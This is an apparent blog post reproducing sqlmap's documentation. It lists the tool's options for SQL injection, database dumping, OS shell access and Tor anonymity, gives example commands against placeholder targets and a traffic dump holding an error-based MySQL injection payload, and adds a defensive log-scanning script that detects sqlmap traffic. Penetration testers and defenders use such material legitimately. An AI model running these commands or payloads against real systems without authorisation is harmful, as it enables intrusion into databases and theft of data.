Sqlmap basic usage

Posted by ukspudnie on Fri, 28 Jan 2022 21:15:20 +0100

SQLmap

usage

Usage: python sqlmap.py [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the target(s)

    -d DIRECT           Connection string for direct database connection
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file

  Request:
    These options can be used to specify how to connect to the target URL

    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (username:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (username:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
                        (translator's note: some sites drop the session after
                        several consecutive bad requests; see the "Request"
                        section below)
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token
    --force-ssl         Force usage of SSL/HTTPS
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")

  Optimization:
    These options can be used to optimize the performance of sqlmap

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(S) connections
    --null-connection   Retrieve page length without the actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(S) requests (default 1)

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that do not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --dbms=DBMS         Force back-end DBMS (database management system) to
                        provided value (e.g. MySQL)
    --dbms-cred=DBMS..  DBMS authentication credentials (username:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ";
                        translator's note:
                        B: Boolean-based blind SQL injection
                        E: Error-based SQL injection
                        U: UNION query SQL injection
                        S: Stacked queries SQL injection
                        T: Time-based blind SQL injection
                        Q: Inline query SQL injection)
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
                        (translator's note: recommended reading on retrieving
                        data over DNS in SQL injection:
                        http://cb.drops.wiki/drops/tips-5283.html; also
                        explained in the "Techniques" section below)
    --second-url=SEC..  Resulting page URL searched for second-order response
                        (translator's note: used for second-order SQL injection)
    --second-req=SEC..  Load second-order HTTP request from file

  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint

  Enumeration:
    These options can be used to enumerate the back-end database management
    system information, structure and data contained in the tables.
    Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA (database administrator)
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)

  Brute force:
    These options can be used to run brute force checks

    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns

  User-defined function injection:
    These options can be used to create custom user-defined functions

    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library

  File system access:
    These options can be used to access the back-end DBMS underlying file system

    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to

  Operating system access:
    These options can be used to access the back-end DBMS underlying operating system

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

  Windows registry access:
    These options can be used to access the back-end DBMS Windows registry

    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

  General:
    These options can be used to set some general working parameters

    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing of response data
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --update            Update sqlmap

  Miscellaneous:
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --beep              Beep on question and/or when SQL injection is found
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --identify-waf      Make a thorough testing for a WAF/IPS protection
    --mobile            Imitate smartphone through HTTP User-Agent header
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --smart             Conduct thorough tests only if positive heuristic(s)
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
    --wizard            Simple wizard interface for beginner users

Output level of detail

Option: -v

This option sets the verbosity of the output. There are seven levels. The default level is 1, whose output includes information, warning, error and critical messages as well as Python tracebacks (if any).

  • 0: show only Python tracebacks, error and critical messages.
  • 1: also show information and warning messages.
  • 2: also show debug messages.
  • 3: also show the injected payloads.
  • 4: also show HTTP requests.
  • 5: also show HTTP response headers.
  • 6: also show HTTP response page content.

Level 2 helps you understand what sqlmap is doing internally, especially in the detection phase and when using the takeover features. If you want to see which SQL payloads sqlmap sends, level 3 is the best choice. When filing a potential bug report to the developers, it is recommended to use this level and attach the standard output together with the traffic log file generated with the option -t.

When it is necessary to dig deeper into a potential bug or to handle an unknown situation, level 4 or above is recommended. Note that the verbosity level can also be set with the switch form of this option (instead of the option form), where the number of letters v determines the level (for example, -v instead of -v 2, -vv instead of -v 3, -vvv instead of -v 4, and so on).

Target

Provide at least one of the following options to specify the target.

Direct database

Option: -d

Run the sqlmap tool for a single database instance. This option can be set to a connection string in the following format:

  • DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME (MySQL, Oracle, Microsoft SQL Server, PostgreSQL, etc.)
  • DBMS://DATABASE_FILEPATH (SQLite, Microsoft Access, Firebird, etc.)

For example:

$ python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users

Destination URL

Options: -u or --url

Run sqlmap against a single target URL. This option can be set to a URL in the following format:

http(s)://targeturl[:port]/[...]

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

Resolve target from Burp or WebScarab proxy log

Option: -l

In addition to providing a single target URL, you can also test and inject into the HTTP requests that went through Burp proxy or WebScarab proxy. When using this option, you need to provide the proxy's HTTP request log file.

Parse target from remote site map (. xml)

Option: -x

A sitemap lets a site administrator list all the page locations of a website so that search engines know its content structure. You can use the option -x to give sqlmap a sitemap address (for example: -x http://www.target.com/sitemap.xml) to search it for usable target URLs.

Read multiple targets from a given text file for scanning

Option: -m

Provide a list of target URLs in a text file and sqlmap will scan and test them one by one.

Example of a URL list in such a file:

www.target1.com/vuln1.php?q=foobar
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*

Load HTTP request from file

Option: -r

sqlmap can read a raw HTTP request from a text file. This way you can avoid setting several options by hand (such as cookies, POST data and other parameters).

A sample HTTP request file:

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1

If the request is meant for HTTPS, you can use the switch --force-ssl to force SSL on the 443/tcp connection. Alternatively, you can append :443 directly to the value of the Host header.
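As an added example (not sqlmap's own code), here is a small parser for the request-file format described above. It applies the same HTTPS rule: the scheme becomes https when a force-SSL flag is given or when the Host header carries an explicit :443 port. The function names and the constructed sample request are this example's own.

```python
"""Parse a raw HTTP request file of the kind sqlmap's -r option reads.

Added example, not sqlmap's own code.  It applies the HTTPS rule stated
above: the scheme is https when force_ssl is set (the --force-ssl switch)
or when the Host header carries an explicit :443 port.
"""
from urllib.parse import parse_qsl, urlsplit

# Constructed sample, identical to the request file shown above.
SAMPLE_REQUEST = (
    "POST /vuln.php HTTP/1.1\n"
    "Host: www.target.com\n"
    "User-Agent: Mozilla/4.0\n"
    "\n"
    "id=1\n"
)


def _header(headers, name):
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def parse_request_file(text, force_ssl=False):
    """Return method, target URL, headers, body and the GET/POST parameters found."""
    # Request files may be saved with CRLF or LF; the first blank line ends the headers.
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % lines[0])
    method, path, _version = parts
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip()] = value.strip()
    host = _header(headers, "Host")
    if not host:
        raise ValueError("request file has no Host header")
    # Scheme selection: --force-ssl or an explicit :443 on the Host header.
    hostname, _, port = host.partition(":")
    scheme = "https" if force_ssl or port == "443" else "http"
    # Drop a redundant default port so the URL reads cleanly.
    if (scheme == "https" and port == "443") or (scheme == "http" and port == "80"):
        host = hostname
    url = "%s://%s%s" % (scheme, host, path)
    body = body.strip("\n")
    # Collect the parameters of the kinds sqlmap tests: query string first, then
    # form-encoded POST data (in this example a POST value overrides a GET one
    # of the same name).
    params = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        params[key] = ("GET", value)
    ctype = _header(headers, "Content-Type") or "application/x-www-form-urlencoded"
    if body and ctype.startswith("application/x-www-form-urlencoded"):
        for key, value in parse_qsl(body, keep_blank_values=True):
            params[key] = ("POST", value)
    return {"method": method, "url": url, "headers": headers,
            "data": body or None, "params": params}


if __name__ == "__main__":
    print(parse_request_file(SAMPLE_REQUEST))
    print(parse_request_file(SAMPLE_REQUEST, force_ssl=True)["url"])
```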

Use the Google dork result as the destination address

Option: -g

sqlmap also supports testing and injecting GET parameters of the URLs returned by a Google dork.

This option makes sqlmap use the search engine with your current session cookies and perform the relevant search. sqlmap then retrieves the first 100 results returned for the Google dork expression, keeps those that carry GET parameters, and asks you whether to test each URL that may be injectable.

For example:

$ python sqlmap.py -g "inurl:\".php?id=1\""

Read options from INI configuration file

Option: -c

sqlmap supports reading the user's options from an INI configuration file, for example sqlmap.conf.

Note that options given on the command line take precedence: they override the corresponding settings in the configuration file.

Request

The following options specify how to connect to the destination URL.

HTTP method

Option: --method

sqlmap automatically detects the proper HTTP method to use in HTTP requests. However, in some cases it may be necessary to force a specific HTTP method that sqlmap would not choose automatically (for example, PUT). This is what this option is for (for example: --method=PUT).

HTTP data

Option: --data

The default HTTP method is GET. You can implicitly switch to POST by providing the data to be sent in the request body. Like GET parameters, these parameters are also tested for SQL injection.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

Parameter separator

Option: --param-del

In some cases you need to override the default parameter separator (for example, & in GET and POST data) so that sqlmap can split and process each parameter correctly.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

HTTP Cookie request header

Options and switches: --cookie, --cookie-del, --load-cookies and --drop-set-cookie

These options and switches can be used in two situations:

  • Web applications require cookie based authentication, and you know the corresponding parameters.
  • You want to detect the relevant HTTP headers and inject SQL.

In either case, you need to use sqlmap to send a request with cookies. The steps are as follows:

  • Log in to the app using your favorite browser.
  • Copy cookies from the browser's options or HTTP proxy.
  • Go back to the shell and run sqlmap with the copied cookie as the value of the option --cookie.

Note that HTTP Cookie values are usually separated by the ; character rather than &. sqlmap can still recognise them as parameter=value pairs and test them the same way as GET and POST parameters. If the separator character is not ;, you can specify it with the option --cookie-del.

If at any point during the communication the web application's response contains a Set-Cookie header, sqlmap will automatically use its value as the Cookie value in all subsequent HTTP requests. sqlmap will also automatically test these values for SQL injection. This behaviour can be turned off with the switch --drop-set-cookie, after which sqlmap ignores any Set-Cookie response header.

Conversely, if you provide an HTTP Cookie request header with the option --cookie and the target URL at some point sends a Set-Cookie response header, sqlmap will ask you which set of cookies to use for the following HTTP requests.

There is also the option --load-cookies, which reads cookies from a file in Netscape/wget format.

Note that if --level is set to 2 or higher, sqlmap will test the HTTP Cookie request header for SQL injection. See below for details.

HTTP user agent request header

Option and switch: --user-agent and --random-agent

By default, sqlmap executes HTTP requests using the following user agent request header values:

sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

However, it can be forged by providing a custom User-Agent as the value of the option --user-agent.

In addition, if you provide the switch --random-agent, sqlmap will pick a random User-Agent from the ./txt/user-agents.txt text file and use it for all HTTP requests in the session.

Some sites check the HTTP User-Agent request header. If no valid User-Agent is provided, if its value is not a usual one, or if it is blacklisted by a web application firewall or similar defense system, the server will refuse to answer properly. In that case sqlmap shows the following message:

[hh:mm:20] [ERROR] the target URL responded with an unknown HTTP status code, try to 
force the HTTP User-Agent header with option --user-agent or --random-agent

Note that if --level is set to 3 or higher, sqlmap will test the HTTP User-Agent request header for SQL injection. See below for details.

HTTP Host request header

Option: --host

You can manually set the HTTP Host request header value. By default, the HTTP Host request header is parsed from the provided target URL.

Note that if --level is set to 5, sqlmap will test the HTTP Host request header for SQL injection. See below for details.

HTTP Referer request header

Option: --referer

Supports forging HTTP Referer request header values. If there is no explicit setting, the HTTP Referer request header will not be sent in the HTTP request by default.

Note that if -- level is set to 3 or higher, sqlmap will test the HTTP Referer request header for SQL injection. See below for details.

Additional HTTP request headers

Option: --headers

You can provide additional HTTP request headers with the option --headers. Each header must be separated by a newline, which is easier to do from the INI configuration file; see the example in the sqlmap.conf template file.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z "ign,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5
[...]
[xx:xx:44] [TRAFFIC OUT] HTTP request [#5]:
GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20C\
OUNT%28%2A%29%2CCONCAT%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%205473%29%20THEN%201%20ELSE%200%20END%29%29%2C\
0x3a6c666d3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARA\
CTER_SETS%20GROUP%20BY%20x%29a%
29 HTTP/1.1
Host: www.target.com
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Firefox 1.0
Connection: close
[...]
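Both the default User-Agent shown earlier and the error-based payload visible in this traffic dump are observable on the server side. As an added example that is not part of sqlmap, the following Python checks web-server access logs (combined log format assumed) for both signals; the log lines are constructed, the second one carrying the payload from the dump above behind a custom User-Agent, and all function names are this example's own.

```python
"""Flag sqlmap activity in web-server access logs (added example, not sqlmap code)."""
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format is assumed for the input lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures derived from the MySQL error-based payload in the traffic dump
# above.  They are matched against the URL-decoded, whitespace-collapsed
# request, so the long %20 runs seen in the dump cannot be used to evade them.
PAYLOAD_SIGNATURES = {
    "mysql_floor_rand": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "case_when_probe": re.compile(
        r"case\s+when\s*\(.*?\)\s*then\s+1\s+else\s+0\s+end", re.I),
    "select_count_star": re.compile(r"select\s+count\s*\(\s*\*\s*\)", re.I),
}

# Constructed sample: the first line uses sqlmap's default User-Agent, the
# second carries the payload from the dump above behind a custom User-Agent
# (as --user-agent or --random-agent would produce), the third is benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [28/Jan/2022:21:15:20 +0100] "GET /vuln.php?id=1 HTTP/1.1" '
    '200 512 "-" "sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)"',
    '10.0.0.5 - - [28/Jan/2022:21:15:21 +0100] "GET /sqlmap/mysql/get_int.php'
    '?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT'
    '%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20%20%20%3D%20%20'
    '5473%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6c666d3a%2CFLOOR%28RAND'
    '%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20'
    'BY%20x%29a%29 HTTP/1.1" 500 233 "-" "Firefox 1.0"',
    '192.0.2.9 - - [28/Jan/2022:21:16:02 +0100] "GET /index.php?page=about '
    'HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def decode_request_path(path):
    """URL-decode a request path and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(path)).strip()


def classify_request(path, user_agent):
    """Return the reasons a single request looks like sqlmap traffic."""
    reasons = []
    if "sqlmap/" in user_agent.lower():
        reasons.append("user_agent_sqlmap")
    decoded = decode_request_path(path)
    for name, pattern in PAYLOAD_SIGNATURES.items():
        if pattern.search(decoded):
            reasons.append(name)
    return reasons


def scan_access_log(lines):
    """Return one finding per suspicious line; unparsable lines are skipped."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = classify_request(match.group("path"), match.group("ua"))
        if reasons:
            findings.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "status": int(match.group("status")),
                "path": decode_request_path(match.group("path")),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG_LINES):
        print(finding["ip"], finding["status"], ", ".join(finding["reasons"]))
```

The payload signatures, not the User-Agent, are what catch the second line, which is the case that matters once --random-agent or --user-agent is in play.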

HTTP protocol authentication

Options: --auth-type and --auth-cred

These options are used to specify the HTTP protocol authentication implemented by the back-end web server and the valid credentials to use when making HTTP requests to the target application.

The three HTTP protocol authentication mechanisms supported are:

  • Basic
  • Digest
  • NTLM

The syntax of authentication credentials is username:password.

Syntax example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"

HTTP protocol private key authentication

Option: --auth-file

This option should be used when the web server requires a valid client certificate and private key for authentication. The value provided should be a PEM-format key_file containing both the certificate and the private key.

Example of generating a key_file.txt for the --auth-file option:

$ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout auth_file.key -out auth_file.pem &&\
cat auth_file.key auth_file.pem > auth_file.txt && cat auth_file.txt
Generating a 2048 bit RSA private key
.........+++
...........+++
writing new private key to 'auth_file.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
-----BEGIN PRIVATE KEY-----
[...]
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----

Ignore HTTP 401 (unauthorized) error

Switch: --ignore-401

If the target site occasionally returns HTTP 401 (Unauthorized) errors and you want to ignore them, not supply valid credentials, and continue testing, you can use the switch --ignore-401 to suppress the corresponding error.

HTTP(S) proxy

Options and switches: --proxy, --proxy-cred, --proxy-file and --ignore-proxy

You can use the option -- proxy and provide the HTTP(S) proxy address to make the HTTP(S) request reach the target URL through the proxy. The syntax for setting the HTTP(S) proxy is http://url:port .

If the HTTP(S) proxy requires authentication, you can provide the credentials in the format username:password with the option --proxy-cred.

If you want to use a list of (unstable) proxies, skipping to the next one when connection problems occur (for example, blocking of the offending IP address), you can use the option --proxy-file and specify a file containing the proxy list.

When you want to use sqlmap against targets on the local LAN, use the switch --ignore-proxy to bypass the system-level HTTP(S) proxy setting.

Tor anonymous network

Switches and options: --tor, --tor-port, --tor-type and --check-tor

If you need to stay anonymous for whatever reason, you can follow the Tor installation guide to configure a Tor client and Privoxy (or similar) instead of using a single predefined HTTP(S) proxy server. Then the switch --tor makes sqlmap try to set up the Tor proxy connection automatically.

If you want to set the Tor proxy type and port manually, use the options --tor-type and --tor-port (for example: --tor-type=SOCKS5 --tor-port 9050).

It is strongly recommended to use --check-tor occasionally to make sure everything is set up correctly. In some cases a wrong configuration (or a reset of a previous one) of a Tor bundle (such as Vidalia) can make you believe you are anonymised when you are not. With this switch, before making any request to the target, sqlmap sends a request to the official "Are you using Tor?" page to check that everything is working. If the check fails, sqlmap warns you and exits.

Delay between each HTTP request

Option: --delay

You can specify the number of seconds to wait between HTTP(S) requests. The value is a floating-point number; for example, 0.5 means half a second. By default no delay is set.

Timeout connection wait seconds

Option: --timeout

You can specify the number of seconds to wait before an HTTP(S) request times out. The value is a floating-point number; for example, 10.5 means ten and a half seconds. The default is 30 seconds.

HTTP connection timeout maximum retries

Option: --retries

You can specify the maximum number of retries after an HTTP(S) connection timeout. By default sqlmap retries up to three times.

Randomly change the value of a given parameter

Option: --randomize

